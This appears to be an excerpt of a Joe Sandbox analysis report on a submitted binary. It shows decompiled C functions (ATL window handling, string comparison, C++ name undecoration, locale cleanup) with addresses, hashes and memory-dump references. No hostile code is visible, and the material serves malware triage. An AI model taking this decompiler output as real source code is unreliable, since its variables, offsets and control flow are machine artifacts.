                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Destroy
                      • String ID: !m_bModal$%ls$::IsWindow(this->m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 3707531092-711770546
                      • Opcode ID: 84e454492e1df3e12a5a6f14ee85c86e2e2ae8d66db8538631054a5133e1bee0
                      • Instruction ID: 3b757b2d5ea137cf72f1013a933512232c15f4b7b9169addf31496a9c3a2c5c7
                      • Opcode Fuzzy Hash: 84e454492e1df3e12a5a6f14ee85c86e2e2ae8d66db8538631054a5133e1bee0
                      • Instruction Fuzzy Hash: A1110835F923197BCB20A7586D53F7E77588F80B08F1041A6FB09A76C2E5A4DD0047D5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00946D70 Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00946D70(void* __esi) {
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t25;
				void* _t26;

				_t21 =  *0xb315b4; // 0x80000001
				if(_t21 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00957480(0xb315b4);
					_t26 = _t26 + 4;
					if( *0xb315b4 == 0xffffffff) {
						E00946720(0xb315b8, E009D1520(GetProcessHeap(), _t26 - _t26));
						E00958270(0xb315b8, 0x9d57c0);
						E00957430(0xb315b4);
						_t26 = _t26 + 8;
					}
				}
				_t22 =  *0xb3159c; // 0x80000002
				if(_t22 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00957480(0xb3159c);
					_t26 = _t26 + 4;
					_t33 =  *0xb3159c - 0xffffffff;
					if( *0xb3159c == 0xffffffff) {
						E00946D00(0xb3369c, _t33, 0xb315b8);
						E00958270(0xb3369c, 0x9d57a0);
						E00957430(0xb3159c);
						_t26 = _t26 + 8;
					}
				}
				return E009D1520(0xb3369c, _t25 - _t26);
			}







                      0x00946d7c
                      0x00946d88
                      0x00946d8f
                      0x00946d94
                      0x00946d9e
                      0x00946db5
                      0x00946dbf
                      0x00946dcc
                      0x00946dd1
                      0x00946dd1
                      0x00946d9e
                      0x00946ddc
                      0x00946de8
                      0x00946def
                      0x00946df4
                      0x00946df7
                      0x00946dfe
                      0x00946e0a
                      0x00946e14
                      0x00946e21
                      0x00946e26
                      0x00946e26
                      0x00946dfe
                      0x00946e37

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Init_thread_footerInit_thread_header_atexit$HeapProcess
                      • String ID:
                      • API String ID: 3065931843-0
                      • Opcode ID: 1049f3f03fc24fa6a624aaba1a40c323e29416768b416c0c8460197a3ec56154
                      • Instruction ID: 8c471bda15329e82fbe50973bc8e082398ba65234e2f4564981567f987c36881
                      • Opcode Fuzzy Hash: 1049f3f03fc24fa6a624aaba1a40c323e29416768b416c0c8460197a3ec56154
                      • Instruction Fuzzy Hash: C9010CF9A406009BC210F759BC43F6E729A87D671DF618761F90B173A2DE2169048BD3
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00944020 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00944020(void* __esi, CHAR* _a4, CHAR* _a8) {
				char _v5;
				char _v6;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t39;
				void* _t75;
				void* _t76;

				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v5 = E009D1520(CharUpperA( *_a4 & 0x000000ff), _t76 - _t76);
				_v6 = E009D1520(CharUpperA( *_a8 & 0x000000ff), _t76 - _t76);
				while(_v5 != 0 && _v5 == _v6 && _v5 != 0x20 && _v5 != 9) {
					_a4 = E009D1520(CharNextA(_a4), _t76 - _t76);
					_a8 = E009D1520(CharNextA(_a8), _t76 - _t76);
					_v5 = E009D1520(CharUpperA( *_a4 & 0x000000ff), _t76 - _t76);
					_v6 = E009D1520(CharUpperA( *_a8 & 0x000000ff), _t76 - _t76);
				}
				__eflags = _v5;
				if(_v5 == 0) {
					L9:
					__eflags = _v6;
					if(_v6 == 0) {
						L12:
						_t39 = 0;
					} else {
						__eflags = _v6 - 0x20;
						if(_v6 == 0x20) {
							goto L12;
						} else {
							__eflags = _v6 - 9;
							if(_v6 != 9) {
								goto L13;
							} else {
								goto L12;
							}
						}
					}
				} else {
					__eflags = _v5 - 0x20;
					if(_v5 == 0x20) {
						goto L9;
					} else {
						__eflags = _v5 - 9;
						if(_v5 != 9) {
							L13:
							__eflags = _v5 - _v6;
							if(_v5 >= _v6) {
								_v12 = 1;
							} else {
								_v12 = 0xffffffff;
							}
							_t39 = _v12;
						} else {
							goto L9;
						}
					}
				}
				__eflags = _t75 - _t76 + 8;
				return E009D1520(_t39, _t75 - _t76 + 8);
			}










                      0x00944027
                      0x0094402e
                      0x0094404b
                      0x00944064
                      0x00944067
                      0x009440a4
                      0x009440ba
                      0x009440d3
                      0x009440ec
                      0x009440ec
                      0x009440f8
                      0x009440fa
                      0x0094410e
                      0x00944112
                      0x00944114
                      0x00944128
                      0x00944128
                      0x00944116
                      0x0094411a
                      0x0094411d
                      0x00000000
                      0x0094411f
                      0x00944123
                      0x00944126
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00944126
                      0x0094411d
                      0x009440fc
                      0x00944100
                      0x00944103
                      0x00000000
                      0x00944105
                      0x00944109
                      0x0094410c
                      0x0094412c
                      0x00944134
                      0x00944136
                      0x00944141
                      0x00944138
                      0x00944138
                      0x00944138
                      0x00944148
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0094410c
                      0x00944103
                      0x0094414f
                      0x00944159

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Char$Upper$Next
                      • String ID:
                      • API String ID: 3006421506-0
                      • Opcode ID: 3c8b0ec49ab84162a52101035246ffda97b7dc8411f7533bf146e468e84fbcb4
                      • Instruction ID: c35db09b505e4b88bd3bc2d8a5f70c3fd8aeb645c0246bfc601073e7ef1c8019
                      • Opcode Fuzzy Hash: 3c8b0ec49ab84162a52101035246ffda97b7dc8411f7533bf146e468e84fbcb4
                      • Instruction Fuzzy Hash: 8331C731D4D5E46ACF109BB894D27BE7F755E66312B4482C6E961A7241D63D8F80CBC0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00962860 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                      Download Yara Rule
                      C-Code - Quality: 75%
                      			E00962860(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v12;
				char _v20;
				char _v28;
				char _v36;
				char* _t19;
				intOrPtr _t20;
				intOrPtr* _t27;
				intOrPtr _t29;
				intOrPtr _t32;
				char* _t46;
				char* _t47;
				void* _t57;
				void* _t58;

				_t56 = __esi;
				_t55 = __edi;
				_t38 = __ebx;
				_t19 =  *0xb30640; // 0x0
				if( *_t19 != 0) {
					_t20 = E00968D00(__ebx, __edi, __esi,  &_v28);
					_t58 = _t57 + 4;
					_v12 = _t20;
					E0095FBB0(_v12,  &_v20, 0x7b);
					_v5 = 0;
					while(1 != 0) {
						if((_v5 & 0x000000ff) != 0) {
							E0095FDE0( &_v20, 0x2c);
						}
						_t27 = E009686C0(_t38, _t55, _t56,  &_v36);
						_t58 = _t58 + 4;
						E0095FD40( &_v20, _t27);
						_t46 =  *0xb30640; // 0x0
						if( *_t46 == 0x40) {
							_t29 =  *0xb30640; // 0x0
							 *0xb30640 = _t29 + 1;
							_t47 =  *0xb30640; // 0x0
							if( *_t47 != 0x40) {
								_v5 = 1;
								continue;
							}
							_t32 =  *0xb30640; // 0x0
							 *0xb30640 = _t32 + 1;
							break;
						} else {
							E0095F350(_a4, 2);
							return _a4;
						}
					}
					E0095FDE0( &_v20, 0x7d);
					E0095F240(_a4,  &_v20);
					return _a4;
				}
				E0095F350(_a4, 1);
				return _a4;
			}

















                      0x00962860
                      0x00962860
                      0x00962860
                      0x00962866
                      0x00962870
                      0x00962888
                      0x0096288d
                      0x00962890
                      0x0096289c
                      0x009628a1
                      0x009628a5
                      0x009628b4
                      0x009628bb
                      0x009628bb
                      0x009628c4
                      0x009628c9
                      0x009628d0
                      0x009628d5
                      0x009628e1
                      0x009628f2
                      0x009628fa
                      0x009628ff
                      0x0096290b
                      0x0096291c
                      0x00000000
                      0x0096291c
                      0x0096290d
                      0x00962915
                      0x00000000
                      0x009628e3
                      0x009628e8
                      0x00000000
                      0x009628ed
                      0x009628e1
                      0x00962927
                      0x00962933
                      0x00000000
                      0x00962938
                      0x00962877
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00962877
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+.LIBCMTD ref: 0096289C
                      • DName::operator+=.LIBCMTD ref: 009628BB
                      • DName::DName.LIBVCRUNTIMED ref: 009628E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Name::operator+Name::operator+=Node::makeStatus
                      • String ID:
                      • API String ID: 2485589204-0
                      • Opcode ID: f7395fa67e07a92bf8a3d09da6d4260007d77e5341b6b20bafa79a856d5501fe
                      • Instruction ID: c661e060ea4deb7daafcb3ef29f9e7e60503f274259c394dcd79526cf0138b7e
                      • Opcode Fuzzy Hash: f7395fa67e07a92bf8a3d09da6d4260007d77e5341b6b20bafa79a856d5501fe
                      • Instruction Fuzzy Hash: A121F5B0A146189BEB08EF50DCB6BBE3B74BFC0344F144068E80A5B2D1DB35AA44CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00969B40 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00969B40(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char* _t18;
				char* _t39;
				intOrPtr _t42;
				char* _t52;

				_t18 =  *0xb30640; // 0x0
				if( *_t18 != 0) {
					_v8 = E00968D00(__ebx, __edi, __esi,  &_v24);
					E0095FBB0(_v8,  &_v16, 0x7b);
					_t39 =  *0xb30640; // 0x0
					if( *_t39 != 0x40) {
						E0095FD40( &_v16, E0096A1E0(__ebx, __edi, __esi,  &_v32, 0, 0));
						E0095FDE0( &_v16, 0x3a);
						E0095FD40( &_v16, E009686C0(__ebx, __edi, __esi,  &_v40));
					}
					E0095FDE0( &_v16, 0x7d);
					_t52 =  *0xb30640; // 0x0
					if( *_t52 != 0x40) {
						E0095F350(_a4, 2);
						return _a4;
					} else {
						_t42 =  *0xb30640; // 0x0
						 *0xb30640 = _t42 + 1;
						E0095F240(_a4,  &_v16);
						return _a4;
					}
				}
				E0095F350(_a4, 1);
				return _a4;
			}












                      0x00969b46
                      0x00969b50
                      0x00969b70
                      0x00969b7c
                      0x00969b81
                      0x00969b8d
                      0x00969ba3
                      0x00969bad
                      0x00969bc2
                      0x00969bc2
                      0x00969bcc
                      0x00969bd1
                      0x00969bdd
                      0x00969c04
                      0x00000000
                      0x00969bdf
                      0x00969bdf
                      0x00969be8
                      0x00969bf5
                      0x00000000
                      0x00969bfa
                      0x00969bdd
                      0x00969b57
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00969B57
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+.LIBCMTD ref: 00969B7C
                      • DName::operator+=.LIBCMTD ref: 00969BAD
                      • DName::operator+=.LIBCMTD ref: 00969BCC
                      • Mailbox.LIBCMTD ref: 00969BF5
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::operator+=$MailboxName::Name::operator+Node::makeStatus
                      • String ID:
                      • API String ID: 3234464337-0
                      • Opcode ID: 3a4ac263ec097e84e1f7339d32cd7cefa3410b0243889bd0052e4f6a4c1b2b56
                      • Instruction ID: 62e29dde4949f7d2d07213ede6dd471787099d3642867b148c42dda7cae2dde3
                      • Opcode Fuzzy Hash: 3a4ac263ec097e84e1f7339d32cd7cefa3410b0243889bd0052e4f6a4c1b2b56
                      • Instruction Fuzzy Hash: B72151B1A40108ABDB04EF61D8A6FAE7779AF80345F104168F91A5B191DF71BE04CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009B5490 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 203COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E009B5490(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t108;
				intOrPtr _t124;
				void* _t141;
				signed int _t181;
				void* _t199;
				void* _t200;

				_t101 = _a4;
				if( *((intOrPtr*)(_a4 + 0x88)) == 0 ||  *((intOrPtr*)(_a4 + 0x88)) == 0xa06770 ||  *((intOrPtr*)(_a4 + 0x7c)) == 0) {
					L11:
					if( *((intOrPtr*)(_a4 + 0x8c)) != 0) {
						_t32 = _a4 + 0x8c; // 0x4d8bffff
						_t218 =  *((intOrPtr*)( *_t32));
						if( *((intOrPtr*)( *_t32)) == 0) {
							_t34 = _a4 + 0x90; // 0x84e851fc
							L00999480(_t218,  *_t34 - 0xfe, 2);
							_t36 = _a4 + 0x94; // 0x8bfffffb
							L00999480(_t218,  *_t36 - 0x80, 2);
							_t38 = _a4 + 0x98; // 0x8bc35de5
							L00999480( *_t38 - 0x80,  *_t38 - 0x80, 2);
							_t40 = _a4 + 0x8c; // 0x4d8bffff
							_t101 = L00999480( *_t38 - 0x80,  *_t40, 2);
							_t199 = _t199 + 0x20;
						}
					}
					_t42 = _a4 + 0x9c; // 0xec8b55ff
					E009B5790(_t101,  *_t42);
					_t200 = _t199 + 4;
					_v8 = 0;
					while(_v8 <= 5) {
						if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x20)) != 0xa061e8 &&  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x28)) != 0) {
							_t58 = (_v8 << 4) + 0x28; // 0x8bcccccc
							if( *((intOrPtr*)( *((intOrPtr*)(_a4 + _t58)))) == 0) {
								_t62 = (_v8 << 4) + 0x28; // 0x8bcccccc
								L00999480(_v8 << 4,  *((intOrPtr*)(_a4 + _t62)), 2);
								_t66 = _v8 * 4; // 0xfe45e851
								L00999480(_v8 << 4,  *((intOrPtr*)(_a4 + _t66 + 0xa0)), 2);
								_t200 = _t200 + 0x10;
							}
						}
						if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) == 0 ||  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)) == 0) {
							if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) != 0) {
								L25:
								_t108 = L00994930(_t228, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\locale\\locale_refcounting.cpp", 0xaf, 0, L"%ls", L"(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[category].locale == nullptr && ptloci->lc_category[category].refcount == nullptr)");
								_t200 = _t200 + 0x18;
								if(_t108 == 1) {
									asm("int3");
								}
								goto L27;
							}
							_t181 = _v8 << 4;
							_t124 = _a4;
							_t228 =  *((intOrPtr*)(_t124 + _t181 + 0x24));
							if( *((intOrPtr*)(_t124 + _t181 + 0x24)) == 0) {
								goto L27;
							}
							goto L25;
						} else {
							L27:
							if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) != 0 &&  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)) != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)))) == 0) {
								L00999480(_v8 << 4,  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)), 2);
								_t200 = _t200 + 8;
							}
							_v8 = _v8 + 1;
							continue;
						}
					}
					return L00999480(__eflags, _a4, 2);
				} else {
					_t8 = _a4 + 0x7c; // 0xeb027500
					if( *((intOrPtr*)( *_t8)) != 0) {
						goto L11;
					}
					if( *((intOrPtr*)(_a4 + 0x84)) != 0) {
						_t12 = _a4 + 0x84; // 0xa06074
						_t214 =  *((intOrPtr*)( *_t12));
						if( *((intOrPtr*)( *_t12)) == 0) {
							_t14 = _a4 + 0x84; // 0xa06074
							_t141 = L00999480(_t214,  *_t14, 2);
							_t16 = _a4 + 0x88; // 0xce1de850
							E009B34B0(_t141,  *_t16);
							_t199 = _t199 + 0xc;
						}
					}
					if( *((intOrPtr*)(_a4 + 0x80)) != 0) {
						_t20 = _a4 + 0x80; // 0xa1006a16
						_t216 =  *((intOrPtr*)( *_t20));
						if( *((intOrPtr*)( *_t20)) == 0) {
							_t22 = _a4 + 0x80; // 0xa1006a16
							L00999480(_t216,  *_t22, 2);
							_t24 = _a4 + 0x88; // 0xce1de850
							E009B3D00( *_t24,  *_t24);
							_t199 = _t199 + 0xc;
						}
					}
					_t26 = _a4 + 0x7c; // 0xeb027500
					L00999480(_t216,  *_t26, 2);
					_t28 = _a4 + 0x88; // 0xce1de850
					_t101 = L00999480(_t216,  *_t28, 2);
					_t199 = _t199 + 0x10;
					goto L11;
				}
			}










                      0x009b5496
                      0x009b54a0
                      0x009b557a
                      0x009b5584
                      0x009b5589
                      0x009b558f
                      0x009b5592
                      0x009b5599
                      0x009b55a5
                      0x009b55b2
                      0x009b55bf
                      0x009b55cc
                      0x009b55d9
                      0x009b55e6
                      0x009b55ed
                      0x009b55f2
                      0x009b55f2
                      0x009b5592
                      0x009b55f8
                      0x009b55ff
                      0x009b5604
                      0x009b5607
                      0x009b5619
                      0x009b5634
                      0x009b564f
                      0x009b5656
                      0x009b5663
                      0x009b5668
                      0x009b5678
                      0x009b5680
                      0x009b5685
                      0x009b5685
                      0x009b5656
                      0x009b5696
                      0x009b56b6
                      0x009b56c8
                      0x009b56e0
                      0x009b56e5
                      0x009b56eb
                      0x009b56ed
                      0x009b56ed
                      0x00000000
                      0x009b56eb
                      0x009b56bb
                      0x009b56be
                      0x009b56c1
                      0x009b56c6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009b56ee
                      0x009b56ee
                      0x009b56fc
                      0x009b5730
                      0x009b5735
                      0x009b5735
                      0x009b5616
                      0x00000000
                      0x009b5616
                      0x009b5696
                      0x009b574e
                      0x009b54c6
                      0x009b54c9
                      0x009b54cf
                      0x00000000
                      0x00000000
                      0x009b54df
                      0x009b54e4
                      0x009b54ea
                      0x009b54ed
                      0x009b54f4
                      0x009b54fb
                      0x009b5506
                      0x009b550d
                      0x009b5512
                      0x009b5512
                      0x009b54ed
                      0x009b551f
                      0x009b5524
                      0x009b552a
                      0x009b552d
                      0x009b5534
                      0x009b553b
                      0x009b5546
                      0x009b554d
                      0x009b5552
                      0x009b5552
                      0x009b552d
                      0x009b555a
                      0x009b555e
                      0x009b556b
                      0x009b5572
                      0x009b5577
                      0x00000000
                      0x009b5577

                      APIs
                      Strings
                      • %ls, xrefs: 009B56CD
                      • (ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 009B56C8
                      • minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 009B56D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___free_lconv_mon___free_lconv_num
                      • String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
                      • API String ID: 717313246-164516335
                      • Opcode ID: fe7688ce3f8145bc3bf6e3a782413649d0a1c3593a738df5ed01e70d1d4d9b24
                      • Instruction ID: 60c28c9c29362f454930427abc34246c0ffa538e2ff6aed65f14fdfe4aa205f5
                      • Opcode Fuzzy Hash: fe7688ce3f8145bc3bf6e3a782413649d0a1c3593a738df5ed01e70d1d4d9b24
                      • Instruction Fuzzy Hash: A2812CB4600204EFEB14CF18C985FE93766BB84359F558268F8495F392DB75EE86CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00956190 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158COMMON
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00956190(void* __edi, void* __esi, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int* _v8;
				char _v48;
				signed int _v56;
				signed int _v64;
				signed int _v72;
				signed int _v76;
				void _v80;
				void* _t96;
				void* _t110;
				signed int* _t121;
				signed int _t132;
				signed int _t146;
				void* _t159;
				void* _t160;
				void* _t161;

				memset( &_v80, 0xcccccccc, 0x13 << 2);
				_t161 = _t160 + 0xc;
				_v8 = _a4;
				E00954D70( &_v48, _v8[1], _a8, _a12, _a16, 1);
				_v56 = _v8[6];
				_v8[6] =  &_v48;
				_v64 = 0;
				_t157 = _t161;
				_v72 = E009D1520( *((intOrPtr*)( *( *_v8)))(_v8[1], _a8, _a12, _a16,  &_v64, 0), _t161 - _t161);
				_t121 = _v8;
				_t164 =  *((intOrPtr*)(_t121 + 0x18)) -  &_v48;
				if( *((intOrPtr*)(_t121 + 0x18)) !=  &_v48) {
					_t110 = L00994930(_t164, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf55, 0, L"%ls", L"pThis->m_pCurrentMsg == &msg");
					_t161 = _t161 + 0x18;
					if(_t110 == 1) {
						asm("int3");
					}
				}
				_t146 = _v56;
				_v8[6] = _t146;
				if(_v72 == 0) {
					__eflags = _a8 - 0x82;
					if(__eflags == 0) {
						_t132 = _v8[7] | 0x00000001;
						__eflags = _t132;
						_t146 = _v8;
						 *(_t146 + 0x1c) = _t132;
					}
					L16:
					if((_v8[7] & 0x00000001) != 0) {
						_t146 = _v8;
						if( *((intOrPtr*)(_t146 + 0x18)) == 0) {
							_v76 = _v8[1];
							_v8[1] = 0;
							_v8[7] = _v8[7] & 0xfffffffe;
							_t146 =  *_v8;
							E009D1520( *((intOrPtr*)( *((intOrPtr*)(_t146 + 0xc))))(_v76), _t161 - _t161);
						}
					}
					_push(_t146);
					_push(_v72);
					E009D14C0(_t159, 0x956368);
					_pop(_t96);
					return E009D1520(_t96, _t159 - _t161 + 0x4c);
				}
				_v80 = _a8;
				if(_v80 > 0x132) {
					_v80 = _v80 - 0x133;
					if(_v80 > 5) {
						L11:
						_t146 = _v8[7] & 0x00000001;
						__eflags = _t146;
						if(__eflags == 0) {
							_t146 =  *(_v8 + 4);
							E0094C3E0(_t157, _t146, 0, _v64);
							_t161 = _t161 + 0xc;
						}
						L13:
						goto L16;
					}
					_t146 = _v80;
					goto  *((intOrPtr*)(_t146 * 4 +  &M00956480))[L10]goto ( *((intOrPtr*)(_t146 * 4 +  &M00956480)));
					L10:
					_v72 = _v64;
					goto L13;
				}
				if(_v80 == 0x132) {
					goto L10;
				}
				_v80 = _v80 - 0x2e;
				if(_v80 > 0xe2) {
					goto L11;
				}
				_t42 = _v80 + 0x95639c; // 0x62af9000
				switch( *((intOrPtr*)(( *_t42 & 0x000000ff) * 4 +  &M00956394))) {
					case 0:
						goto L10;
					case 1:
						goto L11;
				}
			}


















                      0x009561a5
                      0x009561a5
                      0x009561aa
                      0x009561c5
                      0x009561d0
                      0x009561d9
                      0x009561dc
                      0x009561e3
                      0x00956211
                      0x00956214
                      0x0095621a
                      0x0095621d
                      0x00956237
                      0x0095623c
                      0x00956242
                      0x00956244
                      0x00956244
